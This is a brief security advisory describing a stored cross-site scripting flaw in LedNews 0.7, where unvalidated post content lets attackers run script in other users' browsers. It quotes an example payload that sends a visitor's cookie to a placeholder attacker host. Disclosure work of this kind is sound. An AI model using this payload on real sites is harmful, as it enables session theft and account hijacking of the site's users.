Description:
A vulnerability has been identified in LedNews, which can be exploited by malicious people to conduct Cross-Site Scripting attacks against other users.

The vulnerability is caused due to missing validation of user input supplied in posted messages. A malicious person can exploit this to execute arbitrary script code in a user's browser session by including it in a post.

Successful exploitation can result in disclosure of various information (eg. cookie-based authentication information) associated with the site running LedNews or inclusion of malicious content, which the user thinks is part of the real website.

An example is included in the original advisory, which will send a user's cookie to a remote server:
<script>
document.location.replace('http://[evil]/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>

The vulnerability has been reported in version 0.7. However, prior versions may also be affected.

Solution:
Use another product.
